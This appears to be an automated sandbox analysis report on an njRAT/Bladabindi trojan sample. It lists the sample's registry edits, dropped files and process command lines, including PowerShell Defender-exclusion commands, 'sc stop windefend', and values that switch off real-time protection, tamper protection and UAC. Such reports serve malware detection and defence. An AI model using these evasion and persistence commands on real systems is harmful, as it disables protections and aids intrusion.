Malware Analysis Report

2025-08-10 21:18

Sample ID 240127-ghd2rseeb2
Target 796ed4b0db9b3d50149b39c35c97fb22
SHA256 37db478cd1a50883e179c601987b3a5171823aaa9d04063817fa7af57723ffb7
Tags njrat client evasion persistence trojan
Score 10/10

Analysis Overview

Score 10/10

SHA256 37db478cd1a50883e179c601987b3a5171823aaa9d04063817fa7af57723ffb7

Threat Level: Known bad

The file 796ed4b0db9b3d50149b39c35c97fb22 was found to be: Known bad.

Malicious Activity Summary

njrat client evasion persistence trojan

Turns off Windows Defender SpyNet reporting

njRAT/Bladabindi

Modifies Windows Defender Real-time Protection settings

UAC bypass

Windows security bypass

Nirsoft

Stops running service(s)

Loads dropped DLL

Checks computer location settings

Windows security modification

Executes dropped EXE

Drops startup file

Adds Run key to start application

Checks whether UAC is enabled

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Launches sc.exe

Drops file in Program Files directory

Drops file in Windows directory

Program crash

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

System policy modification

Delays execution with timeout.exe

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Analysis: static1

Detonation Overview

Reported

2024-01-27 05:48

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-01-27 05:47

Reported

2024-01-27 05:50

Platform

win10v2004-20231215-en

Max time kernel

149s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A

Turns off Windows Defender SpyNet reporting

evasion

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\EdgeBrowser.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\EdgeBrowser.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe = "0" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe = "0" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe = "0" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\EdgeBrowser.exe = "0" C:\Windows\EdgeBrowser.exe N/A

njRAT/Bladabindi

trojan njrat

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation C:\Windows\EdgeBrowser.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\8ba77dff-9026-4926-9458-42a1833160cf\AdvancedRun.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation C:\Windows\EdgeBrowser.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\EdgeBrowser.exe = "0" C:\Windows\EdgeBrowser.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe = "0" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe = "0" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe = "0" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7 = "C:\\Program Files\\Common Files\\System\\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\\svchost.exe" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7 = "C:\\Program Files\\Common Files\\System\\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\\svchost.exe" C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7 = "C:\\Program Files\\Common Files\\System\\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\\svchost.exe" C:\Windows\EdgeBrowser.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\EdgeBrowser.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Windows\EdgeBrowser.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A
N/A N/A C:\Windows\EdgeBrowser.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\EdgeBrowser.exe C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
File opened for modification C:\Windows\EdgeBrowser.exe C:\Windows\EdgeBrowser.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\8ba77dff-9026-4926-9458-42a1833160cf\AdvancedRun.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a8d1037-c218-4468-b049-38d039afce41\AdvancedRun.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e8a9de02-0594-4d3e-9afc-2e8d01ca4dd4\AdvancedRun.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8ba77dff-9026-4926-9458-42a1833160cf\AdvancedRun.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\8ba77dff-9026-4926-9458-42a1833160cf\AdvancedRun.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\sc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3a8d1037-c218-4468-b049-38d039afce41\AdvancedRun.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\3a8d1037-c218-4468-b049-38d039afce41\AdvancedRun.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\e8a9de02-0594-4d3e-9afc-2e8d01ca4dd4\AdvancedRun.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\e8a9de02-0594-4d3e-9afc-2e8d01ca4dd4\AdvancedRun.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\EdgeBrowser.exe N/A
Token: 33 N/A C:\Windows\EdgeBrowser.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\EdgeBrowser.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\008d5608-fb82-4b14-a4f4-16aeb5d00930\AdvancedRun.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\008d5608-fb82-4b14-a4f4-16aeb5d00930\AdvancedRun.exe N/A
Token: 33 N/A C:\Windows\EdgeBrowser.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\EdgeBrowser.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\EdgeBrowser.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\EdgeBrowser.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\EdgeBrowser.exe N/A
Token: 33 N/A C:\Windows\EdgeBrowser.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\EdgeBrowser.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2841dd81-cf01-489d-83c7-652a0936f2d0\AdvancedRun.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2841dd81-cf01-489d-83c7-652a0936f2d0\AdvancedRun.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2320 wrote to memory of 5100 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Users\Admin\AppData\Local\Temp\8ba77dff-9026-4926-9458-42a1833160cf\AdvancedRun.exe
PID 5100 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\8ba77dff-9026-4926-9458-42a1833160cf\AdvancedRun.exe C:\Users\Admin\AppData\Local\Temp\8ba77dff-9026-4926-9458-42a1833160cf\AdvancedRun.exe
PID 2320 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2320 wrote to memory of 1376 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2320 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2320 wrote to memory of 3616 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\system32\sc.exe
PID 2320 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2320 wrote to memory of 868 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe
PID 2320 wrote to memory of 1360 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2320 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2320 wrote to memory of 320 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 868 wrote to memory of 1004 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe C:\Users\Admin\AppData\Local\Temp\3a8d1037-c218-4468-b049-38d039afce41\AdvancedRun.exe
PID 2320 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\cmd.exe
PID 4984 wrote to memory of 5452 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 2404 wrote to memory of 5748 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 868 wrote to memory of 5844 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 868 wrote to memory of 5884 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 868 wrote to memory of 5928 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 868 wrote to memory of 5996 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 868 wrote to memory of 6088 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2320 wrote to memory of 5432 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\EdgeBrowser.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\8ba77dff-9026-4926-9458-42a1833160cf\AdvancedRun.exe

"C:\Users\Admin\AppData\Local\Temp\8ba77dff-9026-4926-9458-42a1833160cf\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\8ba77dff-9026-4926-9458-42a1833160cf\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run

C:\Users\Admin\AppData\Local\Temp\8ba77dff-9026-4926-9458-42a1833160cf\AdvancedRun.exe

"C:\Users\Admin\AppData\Local\Temp\8ba77dff-9026-4926-9458-42a1833160cf\AdvancedRun.exe" /SpecialRun 4101d8 5100

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe" -Force

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe" -Force

C:\Users\Admin\AppData\Local\Temp\3a8d1037-c218-4468-b049-38d039afce41\AdvancedRun.exe

"C:\Users\Admin\AppData\Local\Temp\3a8d1037-c218-4468-b049-38d039afce41\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\3a8d1037-c218-4468-b049-38d039afce41\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\3a8d1037-c218-4468-b049-38d039afce41\test.bat"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout 1

C:\Windows\system32\sc.exe

sc stop windefend

C:\Windows\SysWOW64\timeout.exe

timeout 1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

